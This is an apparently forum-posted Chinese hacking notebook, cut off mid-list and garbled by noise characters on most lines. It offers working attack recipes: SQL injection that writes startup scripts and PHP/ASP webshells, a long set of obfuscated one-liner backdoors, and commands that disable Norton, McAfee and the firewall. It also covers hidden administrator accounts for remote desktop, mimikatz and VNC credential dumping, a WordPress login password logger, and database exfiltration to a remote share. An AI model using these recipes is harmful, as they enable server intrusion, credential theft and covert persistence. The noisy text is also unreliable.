insert into a values ("set wshshell=createobject (""wscript.shell"") " );
1 z+ g7 ^5 J" q4 L" x# m* pinsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );8 ^! p% t! x8 N' t
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );/ H7 k1 ]! v, C, s
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";" a0 h& O5 ?$ r& k) m, F
drop table a;- P9 E- K6 V" ~! L% I
; m8 j& `- h2 C% S! J d英文版本:
+ y1 H: C; H' j/ p! @" l* s) ]: }3 Z6 ^3 g) T
use test;. y* k _0 \6 j* c/ }
create table a (cmd text);2 {! T4 R4 x" Y
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
2 J3 e/ ^$ t1 }insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );2 ~0 b$ v! a% U* s' U
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );' I+ U8 e! c& S0 V( C: a0 v! R
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";; a# a1 d2 Z" F7 G1 j
drop table a;# O, B- x# u3 n) T% M8 S
- b8 n* K; F2 K% l) W
create table a (cmd BLOB);) [% |# U5 N8 c4 ?% X. O" d
insert into a values (CONVERT(木马的16进制代码,CHAR));9 o# A- i7 Q6 y! z+ c- Q
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'2 d! }- U0 X% {' T; e
drop table a;- m" A! d E9 M8 d, B9 t/ s: L
0 u4 L" U+ n9 u& F9 s0 u* r
记录一下怎么处理变态诺顿4 @' v6 M; Q& E; ^, }* i" y
查看诺顿服务的路径" k# b8 ]* B2 d5 }% K r
sc qc ccSetMgr
0 X! h) J; d+ u4 e然后设置权限拒绝访问。做绝一点。。
; H9 R6 _5 Q+ C9 V3 l X" Ccacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system; s( C0 ~3 C; n1 S# v
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
' ]* z1 M) J4 K. b7 r( P3 acacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators4 l$ [; W. y8 q3 ]0 J8 L
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
4 Y8 k- [8 {7 ]+ \. A
+ [( C! S5 Q( J4 G然后再重启服务器
( ^7 C7 O# ?9 w: x; l4 Uiisreset /reboot' T9 V5 q. i! ~6 X" {5 d; }% O
这样就搞定了。。不过完事后。记得恢复权限。。。。
0 r* v# x Y# b! ]cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F0 ~4 U: ?+ ]2 f% x- K3 t$ i
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F6 n3 ?3 E* b z: c
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F! @3 \, K" \8 A' D! g- g" A
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F! y1 B& l% l7 G" q; r/ R
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
! Z( f) |# h( H
' m- e5 N1 f9 [* OEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')' t; o: U4 q1 @7 c
: A: T. u7 a# W$ ~' Ppostgresql注射的一些东西* R$ ]- B; F7 L3 O: }2 E
如何获得webshell7 h7 I, y0 W9 ~, s5 b5 j$ _% g! ~% i
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); / `/ V" x' k4 o/ k P+ A/ Q
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
3 ^! A; S8 t& X. dhttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
2 e2 M' L& V& @9 @1 m0 _4 _9 k如何读文件; E! V' I% m% G6 U& q) E' @
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);4 l* \, |, [& N
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
. J7 v5 B- F8 W' khttp://127.0.0.1/postgresql.php?id=1;select * from myfile;
6 a: l2 b. I0 m3 h5 N8 M0 @% V% p1 D: E
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。" d+ `- P$ {9 N6 s6 P1 l
当然,这些的postgresql的数据库版本必须大于8.X6 L# j3 J% I, y& F3 o: i
创建一个system的函数:
" B5 t" |1 z# q1 lCREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT$ E L$ l; R, B+ P5 h& J- S" |4 x7 I7 g* U
% T4 X+ s0 Z/ f% d4 M
创建一个输出表:
- G, h8 U6 ^# q0 T( H& O' V. cCREATE TABLE stdout(id serial, system_out text)
8 R4 ? o6 j" g6 T/ n: X" ^, b$ W* p+ c7 ?5 f! {
执行shell,输出到输出表内:1 Y# I* l: K% n
SELECT system('uname -a > /tmp/test')( ^: g5 F6 I* |! J( @! c% E3 ~
# t7 Y' u8 `% q+ F6 k8 J2 w
copy 输出的内容到表里面;
( s7 |& z1 g! _% o' `$ g% vCOPY stdout(system_out) FROM '/tmp/test'' t2 a$ ~( k! d3 `5 ?; L9 o" S" n. b( p' H
& Q) c. h% j: ^; r8 k从输出表内读取执行后的回显,判断是否执行成功$ Q0 R0 l- C$ U- y$ t7 E
) x8 d9 p$ g- T, }6 } e. ASELECT system_out FROM stdout
- c7 ?) ?) j: @1 e% L下面是测试例子+ k$ F2 w* x9 ]6 X, {. F: j
4 }% Q2 i' _$ R
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
9 n& T, Z/ B2 T9 M6 ?' r/ G) |# B; f, Z9 W( ?5 T
/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
' A& l' p, `8 @' F# l( ^% ~ USTRICT --% Q6 D5 |5 c( m" C1 J0 O4 _. X
' A( N, L/ D. u: U: v/store.php?id=1; SELECT system('uname -a > /tmp/test') --
. j% B5 g- W. ^- f( ~! W5 {: m) a8 z: P0 }! Y
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --9 J2 j9 `+ R( X! W" Q1 U5 ~5 Q
) `# r0 O: ~& {4 k4 k5 R6 _- t) @
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
6 m- L/ A5 T m6 Z5 H$ V$ ~ A6 E) rnet stop sharedaccess stop the default firewall- K! [+ i% G/ r; d+ _
netsh firewall show show/config default firewall1 t* A1 D7 o; g2 f
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall0 k; `+ ?: O) B0 @' F$ \
netsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall
% _& v5 `/ w! [5 I" B5 T+ g, e修改3389端口方法(修改后不易被扫出). B0 I; ?- z2 l
修改服务器端的端口设置,注册表有2个地方需要修改
( s9 A8 p( k2 P' Z
% A) s5 ?9 r, J3 ]- L+ j E[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]+ z& W0 K9 Z6 ]% F5 I% i
PortNumber值,默认是3389,修改成所希望的端口,比如6000* B# ^! }3 R$ M' n; w% b) c3 m
$ G: ]3 I, r! \. X' Y: ?第二个地方:
. d+ c) Y9 Q$ |' J8 k/ ~% S[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] & [: f% W8 J/ c; O8 L% _/ k
PortNumber值,默认是3389,修改成所希望的端口,比如6000
8 @; w' k2 _) b0 \
: @$ r8 L" q$ H现在这样就可以了。重启系统就可以了
. K2 |& x, _3 T% w& n7 a8 W, I( d; _3 X9 p6 Z+ e5 F
查看3389远程登录的脚本1 O t% r3 n N: O7 z+ _* l, j
保存为一个bat文件) u+ j% x/ p$ q$ l5 a+ \
date /t >>D:\sec\TSlog\ts.log4 v) O5 b d6 t8 O! ^2 f$ b
time /t >>D:\sec\TSlog\ts.log5 K# l* x! q. ]2 e9 W. w8 L" K
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log+ n/ Y" Z! l1 ^
start Explorer
1 j* E8 y. `! k, V7 W/ r% Q% @; l. u2 Y- f. i
mstsc的参数:- X$ _ h/ y8 Y9 d8 F
/ ~4 B, j4 u# M
远程桌面连接
# G, _0 ~0 U# P7 b5 ]0 A) t/ q! r1 g4 F Z" t2 }. U6 g8 ~
MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
! X1 Z+ x# X4 ^) X9 t( D [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?7 E$ @& O# S, _2 K6 \1 Y9 G; g
# d- W* _3 [: t* c' ?0 B<Connection File> -- 指定连接的 .rdp 文件的名称。
/ K, L, u4 c: Q) p. j7 ~& k8 W0 ]5 i8 E$ a% N" \0 F. r5 I
/v:<server[:port]> -- 指定要连接到的终端服务器。
, t! ~* d! T T ]: n6 o v, a6 ^9 h1 X6 P
/console -- 连接到服务器的控制台会话。6 ?( Q5 p$ u0 F6 U' d6 q
( }7 ^ T1 G j6 h3 P% M( S
/f -- 以全屏模式启动客户端。
$ C# f/ h1 i: e" k* S( |" a& [ G/ U: t. @/ }
/w:<width> -- 指定远程桌面屏幕的宽度。/ h3 G2 ~# F4 t' { V7 B
( N* X: t, z7 Q2 U/h:<height> -- 指定远程桌面屏幕的高度。: q/ R" _. q4 E6 ~1 p
- _7 z9 o* I9 {" @1 P7 b! \; Z) i/edit -- 打开指定的 .rdp 文件来编辑。7 q, [! R2 U5 z6 p4 a ]9 ~
9 j+ X% v# v0 X) Z7 p
/migrate -- 将客户端连接管理器创建的旧版
+ ?! o8 v. p! S$ C连接文件迁移到新的 .rdp 连接文件。2 d! S0 l* A( ^, B
# C+ y/ g9 H0 n. a
4 |- y0 T0 j7 _- Q" o其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就" F3 i! A7 W5 M& F
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量; E" @3 _* C" {2 J+ X
/ q# [$ P& \' c
命令行下开启3389
5 z# R, x/ ?6 y# wnet user asp.net aspnet /add
- L. \- ~. |& o& p/ e2 r5 snet localgroup Administrators asp.net /add( \2 |2 X& I6 f) T4 |- `% U7 H- [
net localgroup "Remote Desktop Users" asp.net /add
/ H, K; I" ^$ h' K/ g2 {attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
; Y) g1 U$ \+ f* I1 zecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
4 X+ n! @& W) `echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
% m! a6 H0 t" f" n" l" r! Necho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
& j2 \+ ` V' ^$ q0 Z7 }sc config rasman start= auto" |9 G: Y8 X4 S- z5 a b& |
sc config remoteaccess start= auto; I' q: E A. R
net start rasman
( _/ D' }8 E* q( Nnet start remoteaccess8 G8 L0 R+ ~6 T+ x% A% J8 s+ ]
Media
_8 C% G% K' _; }<form id="frmUpload" enctype="multipart/form-data"
4 D) T1 U* j. A0 xaction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>0 E- m( Z, t: m* z
<input type="file" name="NewFile" size="50"><br># G* k" r6 Y$ C* x, Z/ y
<input id="btnUpload" type="submit" value="Upload">% |7 c. C: S4 ]3 Z
</form>
& z* z2 F2 @ O. d
6 I9 l' U/ M/ B3 E/ v- wcontrol userpasswords2 查看用户的密码3 {$ q9 I9 f6 j- M \6 l
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径3 ^) R- e* y. Z U5 m; d$ i
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a* L/ X& j$ N4 ?: g
( u! \1 |' h$ G6 X0 I d, d, X141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
& N- _, d+ n6 {5 r测试1:. @7 ]- S- w; ?
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
# \! S) y) `( X+ @& y& V" V( E& S) X4 J8 B$ M" ^
测试2:
" P1 ^$ c: x$ k2 ^
7 A& f" i) x/ v% I. f% Ecreate table dirs(paths varchar(100),paths1 varchar(100), id int)
# w, e, m" w8 v. J4 Y: e* E' q! y+ V, D8 T
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--. T! s) A; g+ L* X# I
# Q2 m7 E: q. ` n" t; u
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1- M0 t2 X# }- w- b1 Q6 w# j
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令) d' J6 z8 c9 V6 f
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
, _0 P1 ], C8 _; q1 o+ w k' [net stop mcafeeframework
8 d2 G2 i% t! Xnet stop mcshield
; Q% a/ T: [ U( v) R: F" d5 [net stop mcafeeengineservice/ w: t: o7 p4 I- y; ]8 Z
net stop mctaskmanager
+ U. `9 Q2 n& r) h3 |) n qhttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D9 d9 a8 Q0 F% T7 }
; H/ [" j! b7 R4 R1 \0 u: W
VNCDump.zip (4.76 KB, 下载次数: 1)
u0 G5 L1 T. _9 a, n Y密码在线破解http://tools88.com/safe/vnc.php
* s5 f, q- w8 k! k* r8 W/ }VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
: t" S# _) p9 o. u$ I+ }- c; N# f2 x/ l* s8 [1 k8 ?/ ]- s" v$ Y9 S
exec master..xp_cmdshell 'net user'8 q6 }/ q) r; Q' k& P( d
mssql执行命令。
# p7 m, }8 |, _9 K获取mssql的密码hash查询* F9 H" F9 ]. e) s0 @, N
select name,password from master.dbo.sysxlogins
' [6 R0 ]" B$ X) g+ u! `2 `1 }3 v2 {: }$ w
backup log dbName with NO_LOG;
+ G/ X5 J3 ?. Nbackup log dbName with TRUNCATE_ONLY;
4 G A5 }8 s2 h, NDBCC SHRINKDATABASE(dbName);
: e- L! n0 i5 C2 @5 ?1 [( Jmssql数据库压缩& ^- J% v: t! y% w
7 f5 ?: j; s3 G8 V0 }7 BRar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK9 @2 z4 z5 Q/ |" ~
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
$ r# x7 \9 S/ Y) \2 H
* u( e) T0 k" x4 Z$ w& sbackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'2 r5 }3 B! k! r. f' P
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
5 r: C3 r! Q8 z; F6 R0 j
6 m9 C1 {# i0 UDiscuz!nt35渗透要点:3 R6 \: W3 b9 M( G1 g
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default' a5 h7 u! f2 N
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
+ ^5 E& s. _- w- b& p) ^9 _(3)保存。
/ j% K% T" A* v5 B. I5 W% L1 {(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
+ Q+ S1 E9 Z0 ]1 P+ Z6 @d:\rar.exe a -r d:\1.rar d:\website\
4 h. m5 X0 @, e0 _5 n递归压缩website8 _3 A' _' Q3 b- K% F
注意rar.exe的路径# t! u0 L0 t* @3 y. w/ v! r, O
/ O# R0 C# B7 f5 N* ~; w
<?php/ r4 B' P3 n- @8 a: u( q! O# T
/ \$ } p# L7 ?
$telok = "0${@eval($_POST[xxoo])}";
9 u9 v1 r- Z% j s" W: h
1 w; _: D% y, j' ^8 v8 r$username = "123456";( c" H3 {9 C( [0 }1 q- G
: \6 s, o4 t/ g
$userpwd = "123456";
4 {# F: s" p. ^# W
0 A( k% }% ~2 `/ E$telhao = "123456";
. h( n* ]; [' ~2 i& ^. ?5 Q9 [
Q, `# L% [$ q3 l( |$telinfo = "123456";
+ S% u' j# O2 ]$ S; H6 H1 E* V$ G
) ^$ m2 |! w2 e& O8 v5 f?>
/ ]: p3 |: h8 y4 t0 E! Vphp一句话未过滤插入一句话木马
0 [/ C* I- z9 w" g' n: p5 f5 L5 j! q
) f+ _& U- K6 [) R# s. d9 [( N* @站库分离脱裤技巧! U1 h0 f' s' N
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
1 j& W: |: m# {* Iexec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
5 h) j* S1 ?* w/ c& p条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
2 Q$ _/ h' i @3 H这儿利用的是马儿的专家模式(自己写代码)。
" o. H" }. W4 i0 b4 hini_set('display_errors', 1);; L7 p- ^; {; P/ z
set_time_limit(0);" c' h$ I5 Y- \. i! n; m6 z
error_reporting(E_ALL);4 R7 _1 f4 `( t! ]
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());! E* m6 h3 z. F Q$ \7 g
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
g" m# s' N4 \$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());$ J$ {8 z) x Q+ R h
$i = 0;
) B' y& o" q" F% g$tmp = '';
0 Q: w- ~* y$ W% _while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
j+ V3 _% v h t; |9 a& k" T6 u $i = $i+1;
# U8 B; a4 A: w/ K $tmp .= implode("::", $row)."\n";
5 ?# R8 a7 l1 {) W+ u4 _9 [ if(!($i%500)){//500条写入一个文件
; z, P0 |/ J; A; X+ I: | $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';& B8 d! t. u. H4 H% U5 a( z8 L' U
file_put_contents($filename,$tmp);
. }/ z; \! C9 B) o3 Z8 r $tmp = '';
# ~- a7 ]4 Y4 W" c. S }
: T& K8 }: M/ H}/ Y8 m% l) k$ s
mysql_free_result($result);' M( f: H7 P& j8 V5 u/ h
- v, T, Y$ X1 s4 Z) h1 @; \3 {8 C" J) l' Y& W
9 ~: S+ h$ M+ H1 W6 N @$ g# b8 v
//down完后delete
, `9 E) \* ?" [" R1 ]
$ ?, {/ R# q- n0 g
+ l& o+ o0 a( S+ h& F2 Hini_set('display_errors', 1);9 t% R6 _7 j/ B& @. V
error_reporting(E_ALL);8 D! D- N% ^% m# l# m
$i = 0;, L1 v9 T' y2 L" X. K% {
while($i<32) {( S- q& T3 I2 x
$i = $i+1;# z& H( {9 n. u! o9 F( e
$filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
0 L' n' Q& P `: K5 i unlink($filename);
. `' S: ~ i" t3 ~1 S}
/ Q" S$ `+ l+ r+ B, T4 Dhttprint 收集操作系统指纹
8 R. i* z! J/ e# P扫描192.168.1.100的所有端口
, w$ L" f0 l0 {+ j7 R+ w7 ?! Pnmap –PN –sT –sV –p0-65535 192.168.1.100
- K- u1 X' S; ^+ j# ^host -t ns www.owasp.org 识别的名称服务器,获取dns信息4 P& Y) V( q+ [
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
/ N/ k1 U+ j6 j, d+ u" z4 b+ zNetcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host6 L. z' F3 ^, H3 V) E
4 K( {8 C8 G B
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)5 e% c* |% R( o. [- S$ ^) p
) R6 X- F a# Z2 e+ j) |$ n' t MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)& h0 w Q& t+ ?4 v5 n$ o
8 I; Q! O/ M M5 S7 D% e6 d Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x C, P9 B: {) K5 [# X
# c, e, @) C8 j3 V) c% Y* z DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)) `( g, E3 s5 X% }* Y, @/ K1 @# g$ z
- x" n! I5 ?9 a, i" M http://net-square.com/msnpawn/index.shtml (要求安装)
& U+ _4 ]. C* I5 E- ^# ?- H% X! B+ H6 T
tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
: R% _. Q0 R0 h: A& b2 \2 k
6 @, d" {5 U5 \ SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)8 n1 i" c2 N, `9 ^& R/ u: B
set names gb2312
( b" A1 U4 t- p. h8 W; B1 l导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。- i' K; S2 q7 u+ ^7 [# Z& r0 e. T
9 ]7 {% I7 m$ y0 u0 Amysql 密码修改
( s }: f0 g4 O y# K9 g5 MUPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ”
, m3 p' t( l" Q" m xupdate user set password=PASSWORD('antian365.com') where user='root';
: b; Q* u9 L/ Q) D& Sflush privileges;! _0 |. g/ Q$ n; c/ [2 h
高级的PHP一句话木马后门
* [, D1 Y; }- g5 |' G/ ^2 I4 {+ _
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀
$ N* P& b+ k% Q# e: v& a9 g4 a8 a' \; ]$ v; w5 A* J L/ c# V
1、; [, D$ ?: x v e
8 l b1 }; p; V1 @) S$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";, c1 q! m1 m( ^" j
" u" W' }" k) z$hh("/[discuz]/e",$_POST['h'],"Access");
* a( q9 ~2 o% Q2 E" H% Q8 o) w
' v q- ] Y- D R% @- i//菜刀一句话
3 {. B" H5 O9 i) j" g2 S
2 c. Q9 t# U4 x9 T% s5 w2、
7 c5 O' y6 l3 z# _2 B0 D2 X* k2 t! g/ N
( d! Z" q0 c& `& e" u$filename=$_GET['xbid'];0 S0 k* n( n Q/ K
% Z7 r( {% |& T- w/ K8 c% D7 G
include ($filename);
4 ?" h$ n0 H& i8 |, @' G+ H
2 B# ^4 d" ~- j, {5 N* H//危险的include函数,直接编译任何文件为php格式运行+ X5 A2 ~, H# k) g9 Q* X
; C: F; y% d% P) X- `$ x
3、
! \2 c! L+ M% X1 c. _& G8 W
( I; h- G7 q; a6 H* ^$reg="c"."o"."p"."y";/ r" w4 R% ?- b5 s: ]7 v. b4 K
3 g6 S3 D- W1 I# V" r" Q$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
: b8 V! H$ z, c6 ^3 I6 H
/ L& F' h' z8 a//重命名任何文件
; H4 S& ^ W% U4 ]9 r2 O4 n6 Z8 m) v* q) e* \
4、
4 D+ G; G7 h% @8 ^# `( {7 v5 j V9 H2 g
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";! o) N) ]9 U, U3 q
$ _% V8 J4 r4 G0 P/ k3 }
$gzid("/[discuz]/e",$_POST['h'],"Access");1 n/ O, }0 N& l4 o& ?( B
" U6 S2 _6 d6 D) q$ B7 K7 \//菜刀一句话
1 J( u& A0 q6 u8 ~+ b+ f$ y5 J
5、include ($uid);
+ U: U+ C' b4 Y& t/ [0 N9 Y0 |# f8 [2 I) G, f# o
//危险的include函数,直接编译任何文件为php格式运行,POST 4 L) ]" c q& H! Z
* Q, r& H+ e: Z- x
, _8 p/ N: O) _8 H% w3 u$ J
//gif插一句话
# {& |2 r& S; b0 q0 |
9 I+ [5 C3 M" N- J# X6、典型一句话, T; o6 d3 a+ Z# M
, U r) Q/ ^* C5 [2 {
程序后门代码
8 x) n5 k2 Y. I3 s1 c5 B+ H/ s<?php eval_r($_POST[sb])?>
* T3 C9 F6 N$ w4 ~, y* J程序代码
+ U6 p/ I, v' |1 T<?php @eval_r($_POST[sb])?>+ E& d; w& \# e2 o! P1 i" ]5 Q
//容错代码
" V7 h; }( A4 T& i( O程序代码
/ `' v' q+ C$ o<?php assert($_POST[sb]);?>
3 e$ ]( n' l& R, {% v b' \//使用lanker一句话客户端的专家模式执行相关的php语句
+ s# X+ v5 J. G* R% n程序代码2 {" K* i% P ?7 Y
<?$_POST['sa']($_POST['sb']);?>
! U8 v4 j( x \ l; i# u/ ?- E3 _程序代码! R: _ L2 ~9 ^: O+ ~. X8 \* x! G
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
6 _! j& i4 T3 E. C- m, ~程序代码7 Q8 M1 \2 L% x$ S
<?php! ]7 |: T1 s( r1 }/ S& f9 a
@preg_replace("/[email]/e",$_POST['h'],"error");
' p2 N5 [( ]& a9 r* t?>3 G8 m. K3 `* R. H
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入7 T. ~* Q! U# Q
程序代码/ o0 `$ x6 q; A X, Y+ z2 Z6 B
<O>h=@eval_r($_POST[c]);</O>; m1 Z* U( L& r' N( N; q6 u, v
程序代码* g5 k A% F0 [8 b* {! N7 X( W) u7 Y+ b6 S
<script language="php">@eval_r($_POST[sb])</script>( G+ @; y% N5 X; I
//绕过<?限制的一句话
- @' m0 J& b! P% \" f
3 {7 A) `8 [* o% b& f8 T: fhttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip! y6 i# _: d7 d3 }; S& j
详细用法:4 N/ y8 |8 _5 W$ P; i- I; b- E
1、到tools目录。psexec \\127.0.0.1 cmd: Z3 z5 v2 q3 D( Z
2、执行mimikatz X0 B- k7 O/ L1 @
3、执行 privilege::debug
$ }% R. n- ]: n% S5 q" L$ o4、执行 inject::process lsass.exe sekurlsa.dll
; o3 B& v. W. H7 c) D5、执行@getLogonPasswords8 W7 x3 B9 h3 n$ h
6、widget就是密码
/ R9 _3 |2 S3 W9 a' {7、exit退出,不要直接关闭否则系统会崩溃。
8 m8 n+ g! K; y# j5 g* J* E( f1 P: V: Y& X* [" j, s2 z9 R
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面6 K, Y( a8 b, C+ F
3 @2 ?' s8 C6 M# g- I/ ]' u1 n自动查找系统高危补丁
2 g1 g3 G$ j' n: Ksysteminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt* r$ E& o8 `; L# _5 X/ w, V) s$ J
% ]. D+ e( d+ _
突破安全狗的一句话aspx后门
- T9 m% E$ N! K& J" t3 x$ B) m<%@ Page Language="C#" ValidateRequest="false" %>6 a: P, X% o9 K4 B o
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
( s4 {0 l# n. W1 Qwebshell下记录WordPress登陆密码
* V4 W4 [# t) c) i/ g( Q) y( v( D% Zwebshell下记录Wordpress登陆密码方便进一步社工
/ T/ }# ^/ e& }, _7 _在文件wp-login.php中539行处添加:' p4 e/ T2 |0 u+ `
// log password
0 J; e% h, F! J$log_user=$_POST['log'];) y* [) U3 D. \0 _" M- }
$log_pwd=$_POST['pwd'];3 p; A1 q! w' T" t @
$log_ip=$_SERVER["REMOTE_ADDR"];7 P+ K1 H2 z$ G8 a
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
6 x5 r& u( v- x- k$txt=$txt.”\r\n”;! o; }& f$ N/ ]1 l" M( x% n2 x
if($log_user&&$log_pwd&&$log_ip){
& a& g8 O8 v% l3 f@fwrite(fopen(‘pwd.txt’,”a+”),$txt);# e4 r3 u/ U2 {! h
}
6 y9 U _7 Q5 Z9 e当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。6 s! \, u. B2 J! \- i) d" L2 @7 V
就是搜索case ‘login’( Z l' E, `( R( ]8 D
在它下面直接插入即可,记录的密码生成在pwd.txt中,
* |$ w! o$ L6 p/ W/ x其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录9 i# I7 t }7 _" A
利用II6文件解析漏洞绕过安全狗代码:+ a9 J6 n0 t( K2 t0 o; K
;antian365.asp;antian365.jpg
# w9 r: u' M7 b/ E/ d8 \+ [; p% w
" i, L5 y6 c: z1 s各种类型数据库抓HASH破解最高权限密码!
% L- H( I4 c: I7 V0 ?5 s! h1.sql server2000: k4 c; V% O- s' d0 B0 \* H
